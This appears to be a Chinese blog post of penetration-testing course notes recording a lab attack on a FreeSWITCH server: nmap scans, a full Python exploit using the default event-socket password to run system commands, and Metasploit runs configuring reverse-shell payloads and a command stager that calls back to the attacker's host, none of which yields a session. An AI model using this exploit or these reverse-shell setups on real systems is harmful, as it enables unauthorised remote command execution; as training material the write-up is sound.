滲透測試基本技術 第三章 (001)


Posted by nathan2009729 on 2023-03-26

套路的先看看開了哪些port,再針對那些port做詳細掃描:

┌──(kali㉿kali)-[~]
└─$ sudo -i
[sudo] password for kali:
┌──(root㉿kali)-[~]
└─# nmap -p- 172.16.1.105
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-11 03:24 EST
Nmap scan report for 172.16.1.105
Host is up (0.056s latency).
Not shown: 65513 closed tcp ports (reset)
PORT      STATE SERVICE
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
2855/tcp  open  msrp
2856/tcp  open  cesdinv
3306/tcp  open  mysql
5060/tcp  open  sip
5066/tcp  open  stanag-5066
5080/tcp  open  onscreen
5985/tcp  open  wsman
7443/tcp  open  oracleas-https
8021/tcp  open  ftp-proxy
8081/tcp  open  blackice-icecap
8082/tcp  open  blackice-alerts
47001/tcp open  winrm
49152/tcp open  unknown
49153/tcp open  unknown
49154/tcp open  unknown
49155/tcp open  unknown
49156/tcp open  unknown
49157/tcp open  unknown
49158/tcp open  unknown

Nmap done: 1 IP address (1 host up) scanned in 32.61 seconds

┌──(root㉿kali)-[~]
└─# nmap -p135,139,445,2855,2856,3306,5060,5066,5080,5985,7443,8021,8081,8082,47001,49152-49158 172.16.1.105 -sC -sV -O -A
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-11 03:26 EST
Nmap scan report for 172.16.1.105
Host is up (0.018s latency).

PORT      STATE SERVICE          VERSION
135/tcp   open  msrpc            Microsoft Windows RPC
139/tcp   open  netbios-ssn      Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds     Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
2855/tcp  open  msrp?
2856/tcp  open  ssl/cesdinv?
| ssl-cert: Subject: commonName=FreeSWITCH/countryName=US
| Not valid before: 2020-08-24T03:07:10
|_Not valid after:  1984-06-30T20:38:54
|_ssl-date: TLS randomness does not represent time
3306/tcp  open  mysql?
| fingerprint-strings:
|   DNSStatusRequestTCP, DNSVersionBindReqTCP, GenericLines, GetRequest, HTTPOptions, Help, Kerberos, NULL, RPCCheck, RTSPRequest, SMBProgNeg, SSLSessionReq, TLSSessionReq, TerminalServerCookie, X11Probe:
|_    Host '192.168.200.7' is not allowed to connect to this MariaDB server
5060/tcp  open  sip-proxy        FreeSWITCH mod_sofia 1.10.1~64bit
|_sip-methods: INVITE, ACK, BYE, CANCEL, OPTIONS, MESSAGE, INFO, UPDATE, REGISTER, REFER, NOTIFY, PUBLISH, SUBSCRIBE
5066/tcp  open  websocket        (WebSocket version: 13)
| fingerprint-strings:
|   GenericLines, GetRequest, HTTPOptions:
|     HTTP/1.1 400 Bad Request
|_    Sec-WebSocket-Version: 13
5080/tcp  open  sip-proxy        FreeSWITCH mod_sofia 1.10.1~64bit
5985/tcp  open  http             Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
7443/tcp  open  ssl/websocket    (WebSocket version: 13)
| ssl-cert: Subject: commonName=FreeSWITCH/countryName=US
| Not valid before: 2020-08-24T03:07:10
|_Not valid after:  1984-06-30T20:38:54
|_ssl-date: TLS randomness does not represent time
| fingerprint-strings:
|   GenericLines, GetRequest, HTTPOptions:
|     HTTP/1.1 400 Bad Request
|_    Sec-WebSocket-Version: 13
8021/tcp  open  freeswitch-event FreeSWITCH mod_event_socket
8081/tcp  open  websocket        (WebSocket version: 13)
| fingerprint-strings:
|   GenericLines, GetRequest, HTTPOptions:
|     HTTP/1.1 400 Bad Request
|_    Sec-WebSocket-Version: 13
8082/tcp  open  ssl/websocket    (WebSocket version: 13)
| fingerprint-strings:
|   GenericLines, RTSPRequest:
|     HTTP/1.1 400 Bad Request
|_    Sec-WebSocket-Version: 13
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=FreeSWITCH/countryName=US
| Not valid before: 2020-08-24T03:07:10
|_Not valid after:  1984-06-30T20:38:54
47001/tcp open  http             Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49152/tcp open  msrpc            Microsoft Windows RPC
49153/tcp open  msrpc            Microsoft Windows RPC
49154/tcp open  msrpc            Microsoft Windows RPC
49155/tcp open  msrpc            Microsoft Windows RPC
49156/tcp open  msrpc            Microsoft Windows RPC
49157/tcp open  msrpc            Microsoft Windows RPC
49158/tcp open  msrpc            Microsoft Windows RPC
5 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service :
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port3306-TCP:V=7.93%I=7%D=3/11%Time=640C3B54%P=x86_64-pc-linux-gnu%r(NU
SF:LL,4C,"H\0\0\x01\xffj\x04Host\x20'192\.168\.200\.7'\x20is\x20not\x20all
SF:owed\x20to\x20connect\x20to\x20this\x20MariaDB\x20server")%r(GenericLin
SF:es,4C,"H\0\0\x01\xffj\x04Host\x20'192\.168\.200\.7'\x20is\x20not\x20all
SF:owed\x20to\x20connect\x20to\x20this\x20MariaDB\x20server")%r(GetRequest
SF:,4C,"H\0\0\x01\xffj\x04Host\x20'192\.168\.200\.7'\x20is\x20not\x20allow
SF:ed\x20to\x20connect\x20to\x20this\x20MariaDB\x20server")%r(HTTPOptions,
SF:4C,"H\0\0\x01\xffj\x04Host\x20'192\.168\.200\.7'\x20is\x20not\x20allowe
SF:d\x20to\x20connect\x20to\x20this\x20MariaDB\x20server")%r(RTSPRequest,4
SF:C,"H\0\0\x01\xffj\x04Host\x20'192\.168\.200\.7'\x20is\x20not\x20allowed
SF:\x20to\x20connect\x20to\x20this\x20MariaDB\x20server")%r(RPCCheck,4C,"H
SF:\0\0\x01\xffj\x04Host\x20'192\.168\.200\.7'\x20is\x20not\x20allowed\x20
SF:to\x20connect\x20to\x20this\x20MariaDB\x20server")%r(DNSVersionBindReqT
SF:CP,4C,"H\0\0\x01\xffj\x04Host\x20'192\.168\.200\.7'\x20is\x20not\x20all
SF:owed\x20to\x20connect\x20to\x20this\x20MariaDB\x20server")%r(DNSStatusR
SF:equestTCP,4C,"H\0\0\x01\xffj\x04Host\x20'192\.168\.200\.7'\x20is\x20not
SF:\x20allowed\x20to\x20connect\x20to\x20this\x20MariaDB\x20server")%r(Hel
SF:p,4C,"H\0\0\x01\xffj\x04Host\x20'192\.168\.200\.7'\x20is\x20not\x20allo
SF:wed\x20to\x20connect\x20to\x20this\x20MariaDB\x20server")%r(SSLSessionR
SF:eq,4C,"H\0\0\x01\xffj\x04Host\x20'192\.168\.200\.7'\x20is\x20not\x20all
SF:owed\x20to\x20connect\x20to\x20this\x20MariaDB\x20server")%r(TerminalSe
SF:rverCookie,4C,"H\0\0\x01\xffj\x04Host\x20'192\.168\.200\.7'\x20is\x20no
SF:t\x20allowed\x20to\x20connect\x20to\x20this\x20MariaDB\x20server")%r(TL
SF:SSessionReq,4C,"H\0\0\x01\xffj\x04Host\x20'192\.168\.200\.7'\x20is\x20n
SF:ot\x20allowed\x20to\x20connect\x20to\x20this\x20MariaDB\x20server")%r(K
SF:erberos,4C,"H\0\0\x01\xffj\x04Host\x20'192\.168\.200\.7'\x20is\x20not\x
SF:20allowed\x20to\x20connect\x20to\x20this\x20MariaDB\x20server")%r(SMBPr
SF:ogNeg,4C,"H\0\0\x01\xffj\x04Host\x20'192\.168\.200\.7'\x20is\x20not\x20
SF:allowed\x20to\x20connect\x20to\x20this\x20MariaDB\x20server")%r(X11Prob
SF:e,4C,"H\0\0\x01\xffj\x04Host\x20'192\.168\.200\.7'\x20is\x20not\x20allo
SF:wed\x20to\x20connect\x20to\x20this\x20MariaDB\x20server");
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port5066-TCP:V=7.93%I=7%D=3/11%Time=640C3B55%P=x86_64-pc-linux-gnu%r(Ge
SF:nericLines,37,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nSec-WebSocket-Vers
SF:ion:\x2013\r\n\r\n")%r(GetRequest,37,"HTTP/1\.1\x20400\x20Bad\x20Reques
SF:t\r\nSec-WebSocket-Version:\x2013\r\n\r\n")%r(HTTPOptions,37,"HTTP/1\.1
SF:\x20400\x20Bad\x20Request\r\nSec-WebSocket-Version:\x2013\r\n\r\n");
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port7443-TCP:V=7.93%T=SSL%I=7%D=3/11%Time=640C3B68%P=x86_64-pc-linux-gn
SF:u%r(GetRequest,37,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nSec-WebSocket-
SF:Version:\x2013\r\n\r\n")%r(GenericLines,37,"HTTP/1\.1\x20400\x20Bad\x20
SF:Request\r\nSec-WebSocket-Version:\x2013\r\n\r\n")%r(HTTPOptions,37,"HTT
SF:P/1\.1\x20400\x20Bad\x20Request\r\nSec-WebSocket-Version:\x2013\r\n\r\n
SF:");
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port8081-TCP:V=7.93%I=7%D=3/11%Time=640C3B55%P=x86_64-pc-linux-gnu%r(Ge
SF:tRequest,37,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nSec-WebSocket-Versio
SF:n:\x2013\r\n\r\n")%r(GenericLines,37,"HTTP/1\.1\x20400\x20Bad\x20Reques
SF:t\r\nSec-WebSocket-Version:\x2013\r\n\r\n")%r(HTTPOptions,37,"HTTP/1\.1
SF:\x20400\x20Bad\x20Request\r\nSec-WebSocket-Version:\x2013\r\n\r\n");
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port8082-TCP:V=7.93%T=SSL%I=7%D=3/11%Time=640C3B68%P=x86_64-pc-linux-gn
SF:u%r(GenericLines,37,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nSec-WebSocke
SF:t-Version:\x2013\r\n\r\n")%r(RTSPRequest,37,"HTTP/1\.1\x20400\x20Bad\x2
SF:0Request\r\nSec-WebSocket-Version:\x2013\r\n\r\n");
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Microsoft Windows Server 2012 (94%), Microsoft Windows Server 2012 or Windows Server 2012 R2 (94%), Microsoft Windows Server 2012 R2 (94%), Tomato 1.27 - 1.28 (Linux 2.4.20) (91%), Microsoft Windows 7 Professional (90%), Microsoft Windows Server 2008 R2 (90%), Microsoft Windows 7 SP1 (90%), Microsoft Windows 7 or Windows Server 2008 R2 (89%), Microsoft Windows Server 2008 or 2008 Beta 3 (89%), Microsoft Windows Server 2008 R2 or Windows 8.1 (89%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time:
|   date: 2023-03-11T08:30:38
|_  start_date: 2021-05-28T17:04:49
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_nbstat: NetBIOS name: WIN-FH0N2VGINDJ, NetBIOS user: <unknown>, NetBIOS MAC: 00155d2de792 (Microsoft)
| smb2-security-mode:
|   302:
|_    Message signing enabled but not required

TRACEROUTE (using port 135/tcp)
HOP RTT      ADDRESS
1   60.68 ms 192.168.200.1
2   11.27 ms 172.16.1.105

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 239.29 seconds

看到freeswitch,就找一下::

exploit-db:

上面網頁的底下是python檔,所以編輯後執行,但好像沒用?

┌──(root㉿kali)-[/home/kali/PT_day3]
└─# vim freeswitch.py

┌──(root㉿kali)-[/home/kali/PT_day3]
└─# chmod +x freeswitch.py

┌──(root㉿kali)-[/home/kali/PT_day3]
└─# ./freeswitch.py 172.16.1.105 whoami
./freeswitch.py: 12: from: not found
./freeswitch.py: 13: import: not found
./freeswitch.py: 15: Syntax error: word unexpected (expecting ")")

┌──(root㉿kali)-[/home/kali/PT_day3]
└─# python freeswitch.py 172.16.1.105 whoami
Authenticated
Content-Type: api/response
Content-Length: 23

python檔的內容如下:

# -- Example --
# root@kali:~# ./freeswitch-exploit.py 192.168.1.100 whoami
# Authenticated
# Content-Type: api/response
# Content-Length: 20
#
# nt authority\system
# 

#!/usr/bin/python3

from socket import *
import sys

if len(sys.argv) != 3:
    print('Missing arguments')
    print('Usage: freeswitch-exploit.py <target> <cmd>')
    sys.exit(1)

ADDRESS=sys.argv[1]
CMD=sys.argv[2]
PASSWORD='ClueCon' # default password for FreeSWITCH

s=socket(AF_INET, SOCK_STREAM)
s.connect((ADDRESS, 8021))

response = s.recv(1024)
if b'auth/request' in response:
    s.send(bytes('auth {}\n\n'.format(PASSWORD), 'utf8'))
    response = s.recv(1024)
    if b'+OK accepted' in response:
        print('Authenticated')
        s.send(bytes('api system {}\n\n'.format(CMD), 'utf8'))
        response = s.recv(8096).decode()
        print(response)
    else:
        print('Authentication failed')
        sys.exit(1)
else:
    print('Not prompted for authentication, likely not vulnerable')
    sys.exit(1)

再看看有沒有別的poc:

第一個CVE太新了,看看第二個:

根據上面網頁,就是用metaspolit:

┌──(root㉿kali)-[/home/kali/PT_day3]
└─# msfconsole

 ______________________________________
/ it looks like you're trying to run a \
\ module                               /
 --------------------------------------
 \
  \
     __
    /  \
    |  |
    @  @
    |  |
    || |/
    || ||
    |\_/|
    \___/


       =[ metasploit v6.3.2-dev                           ]
+ -- --=[ 2290 exploits - 1201 auxiliary - 409 post       ]
+ -- --=[ 968 payloads - 45 encoders - 11 nops            ]
+ -- --=[ 9 evasion                                       ]

Metasploit tip: Set the current module's RHOSTS with
database values using hosts -R or services
-R
Metasploit Documentation: https://docs.metasploit.com/

msf6 > search freeswitch

Matching Modules
================

   #  Name                                                        Disclosure Dat                e  Rank       Check  Description
   -  ----                                                        --------------                -  ----       -----  -----------
   0  exploit/multi/misc/freeswitch_event_socket_cmd_exec         2019-11-03                       excellent  Yes    FreeSWITCH Event Socket Command Execution
   1  auxiliary/scanner/misc/freeswitch_event_socket_login                                         normal     Yes    FreeSWITCH Event Socket Login
   2  exploit/unix/webapp/fusionpbx_operator_panel_exec_cmd_exec  2019-06-06                       excellent  Yes    FusionPBX Operator Panel exec.php Command Execution


Interact with a module by name or index. For example info 2, use 2 or use exploi                t/unix/webapp/fusionpbx_operator_panel_exec_cmd_exec

msf6 > use 0
[*] Using configured payload cmd/unix/reverse
msf6 exploit(multi/misc/freeswitch_event_socket_cmd_exec) > show options

Module options (exploit/multi/misc/freeswitch_event_socket_cmd_exec):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   PASSWORD  ClueCon          yes       FreeSWITCH event socket password
   RHOSTS                     yes       The target host(s), see https://docs.metasploit.com/do
                                        cs/using-metasploit/basics/using-metasploit.html
   RPORT     8021             yes       The target port (TCP)
   SSL       false            no        Negotiate SSL for incoming connections
   SSLCert                    no        Path to a custom SSL certificate (default is randomly
                                        generated)
   URIPATH                    no        The URI to use for this exploit (default is random)


   When CMDSTAGER::FLAVOR is one of auto,certutil,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http:

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This
                                       must be an address on the local machine or 0.0.0.0 to l
                                       isten on all addresses.
   SRVPORT  8080             yes       The local port to listen on.


Payload options (cmd/unix/reverse):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Unix (In-Memory)



View the full module info with the info, or info -d command.

要注意我們想打的是windows的,所以這裡的Exploit target不對,看看能不能改:

msf6 exploit(multi/misc/freeswitch_event_socket_cmd_exec) > show targets

Exploit targets:
=================

    Id  Name
    --  ----
=>  0   Unix (In-Memory)
    1   Linux (Dropper)
    2   PowerShell (In-Memory)
    3   Windows (In-Memory)
    4   Windows (Dropper)


msf6 exploit(multi/misc/freeswitch_event_socket_cmd_exec) > set target 2
target => 2
msf6 exploit(multi/misc/freeswitch_event_socket_cmd_exec) > show options

Module options (exploit/multi/misc/freeswitch_event_socket_cmd_exec):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   PASSWORD  ClueCon          yes       FreeSWITCH event socket password
   RHOSTS                     yes       The target host(s), see https://docs.metasploit.com/do
                                        cs/using-metasploit/basics/using-metasploit.html
   RPORT     8021             yes       The target port (TCP)
   SSL       false            no        Negotiate SSL for incoming connections
   SSLCert                    no        Path to a custom SSL certificate (default is randomly
                                        generated)
   URIPATH                    no        The URI to use for this exploit (default is random)


   When CMDSTAGER::FLAVOR is one of auto,certutil,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http:

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This
                                       must be an address on the local machine or 0.0.0.0 to l
                                       isten on all addresses.
   SRVPORT  8080             yes       The local port to listen on.


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, no
                                        ne)
   LHOST                      yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   2   PowerShell (In-Memory)



View the full module info with the info, or info -d command.

把target設成windows的power shell。

要注意現在是跳vpn,所以lhost要以上圖為準:

msf6 exploit(multi/misc/freeswitch_event_socket_cmd_exec) > set rhosts 172.16.1.105
rhosts => 172.16.1.105
msf6 exploit(multi/misc/freeswitch_event_socket_cmd_exec) > set lhost 192.168.200.6
lhost => 192.168.200.6
msf6 exploit(multi/misc/freeswitch_event_socket_cmd_exec) > set lport 8080
lport => 8080
msf6 exploit(multi/misc/freeswitch_event_socket_cmd_exec) > show options

Module options (exploit/multi/misc/freeswitch_event_socket_cmd_exec):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   PASSWORD  ClueCon          yes       FreeSWITCH event socket password
   RHOSTS    172.16.1.105     yes       The target host(s), see https://docs.metasploit.com/do
                                        cs/using-metasploit/basics/using-metasploit.html
   RPORT     8021             yes       The target port (TCP)
   SSL       false            no        Negotiate SSL for incoming connections
   SSLCert                    no        Path to a custom SSL certificate (default is randomly
                                        generated)
   URIPATH                    no        The URI to use for this exploit (default is random)


   When CMDSTAGER::FLAVOR is one of auto,certutil,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http:

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This
                                       must be an address on the local machine or 0.0.0.0 to l
                                       isten on all addresses.
   SRVPORT  8080             yes       The local port to listen on.


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, no
                                        ne)
   LHOST     192.168.200.6    yes       The listen address (an interface may be specified)
   LPORT     8080             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   2   PowerShell (In-Memory)



View the full module info with the info, or info -d command.

msf6 exploit(multi/misc/freeswitch_event_socket_cmd_exec) > run

[*] Started reverse TCP handler on 192.168.200.6:8080
[*] 172.16.1.105:8021 - Login success
[*] 172.16.1.105:8021 - Sending payload (323 bytes) ...
[*] Exploit completed, but no session was created.

payload有丟成功,但是爛掉了。可能是因為這漏洞被觸發的當下只能觸發一次,如果觸發到不該觸發的東西就爛掉了。

msf6 exploit(multi/misc/freeswitch_event_socket_cmd_exec) > set target 3
target => 3
msf6 exploit(multi/misc/freeswitch_event_socket_cmd_exec) > show options

Module options (exploit/multi/misc/freeswitch_event_socket_cmd_exec):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   PASSWORD  ClueCon          yes       FreeSWITCH event socket password
   RHOSTS    172.16.1.105     yes       The target host(s), see https://docs.metasploit.com/do
                                        cs/using-metasploit/basics/using-metasploit.html
   RPORT     8021             yes       The target port (TCP)
   SSL       false            no        Negotiate SSL for incoming connections
   SSLCert                    no        Path to a custom SSL certificate (default is randomly
                                        generated)
   URIPATH                    no        The URI to use for this exploit (default is random)


   When CMDSTAGER::FLAVOR is one of auto,certutil,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http:

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This
                                       must be an address on the local machine or 0.0.0.0 to l
                                       isten on all addresses.
   SRVPORT  8080             yes       The local port to listen on.


Payload options (cmd/windows/reverse_powershell):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.200.6    yes       The listen address (an interface may be specified)
   LPORT  8080             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   3   Windows (In-Memory)



View the full module info with the info, or info -d command.

msf6 exploit(multi/misc/freeswitch_event_socket_cmd_exec) > run

[*] Started reverse TCP handler on 192.168.200.6:8080
[*] 172.16.1.105:8021 - Login success
[*] 172.16.1.105:8021 - Sending payload (4305 bytes) ...
[*] Exploit completed, but no session was created.
msf6 exploit(multi/misc/freeswitch_event_socket_cmd_exec) > set target 4
target => 4
msf6 exploit(multi/misc/freeswitch_event_socket_cmd_exec) > show options

Module options (exploit/multi/misc/freeswitch_event_socket_cmd_exec):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   PASSWORD  ClueCon          yes       FreeSWITCH event socket password
   RHOSTS    172.16.1.105     yes       The target host(s), see https://docs.metasploit.com/do
                                        cs/using-metasploit/basics/using-metasploit.html
   RPORT     8021             yes       The target port (TCP)
   SSL       false            no        Negotiate SSL for incoming connections
   SSLCert                    no        Path to a custom SSL certificate (default is randomly
                                        generated)
   URIPATH                    no        The URI to use for this exploit (default is random)


   When CMDSTAGER::FLAVOR is one of auto,certutil,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http:

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This
                                       must be an address on the local machine or 0.0.0.0 to l
                                       isten on all addresses.
   SRVPORT  8080             yes       The local port to listen on.


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, no
                                        ne)
   LHOST     192.168.200.6    yes       The listen address (an interface may be specified)
   LPORT     8080             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   4   Windows (Dropper)



View the full module info with the info, or info -d command.

msf6 exploit(multi/misc/freeswitch_event_socket_cmd_exec) > run

[*] Started reverse TCP handler on 192.168.200.6:8080
[*] 172.16.1.105:8021 - Login success
[*] 172.16.1.105:8021 - Sending payload (323 bytes) ...
[-] 172.16.1.105:8021 - Exploit failed [bad-config]: Rex::BindFailed The address is already in use or unavailable: (0.0.0.0:8080).
[*] Exploit completed, but no session was created.

再去設定不同target,如3(windows in memory)跟4(windows dropper),windows dropper顯示SRVPORT 8080 yes The local port to listen on.代表被占用。

msf6 exploit(multi/misc/freeswitch_event_socket_cmd_exec) > set lport 7070
lport => 7070
msf6 exploit(multi/misc/freeswitch_event_socket_cmd_exec) > run

[*] Started reverse TCP handler on 192.168.200.6:7070
[*] 172.16.1.105:8021 - Login success
[*] 172.16.1.105:8021 - Sending payload (323 bytes) ...
[*] 172.16.1.105:8021 - Using URL: http://192.168.200.6:8080/Qxac3iJkY
[*] 172.16.1.105:8021 - Command Stager progress - 100.00% done (115/115 bytes)
[*] 172.16.1.105:8021 - Server stopped.
[*] Exploit completed, but no session was created.
msf6 exploit(multi/misc/freeswitch_event_socket_cmd_exec) > set target 2
target => 2
msf6 exploit(multi/misc/freeswitch_event_socket_cmd_exec) > run

[*] Started reverse TCP handler on 192.168.200.6:7070
[*] 172.16.1.105:8021 - Login success
[*] 172.16.1.105:8021 - Sending payload (323 bytes) ...
[*] Exploit completed, but no session was created.

換port跟換target都沒用,換下一題好了。










Related Posts

給自己看的 JS 進階-物件導向

給自己看的 JS 進階-物件導向

Day07 MMD (MikuMikuDance)

Day07 MMD (MikuMikuDance)

[Day03] Lazy Evaluation

[Day03] Lazy Evaluation


Comments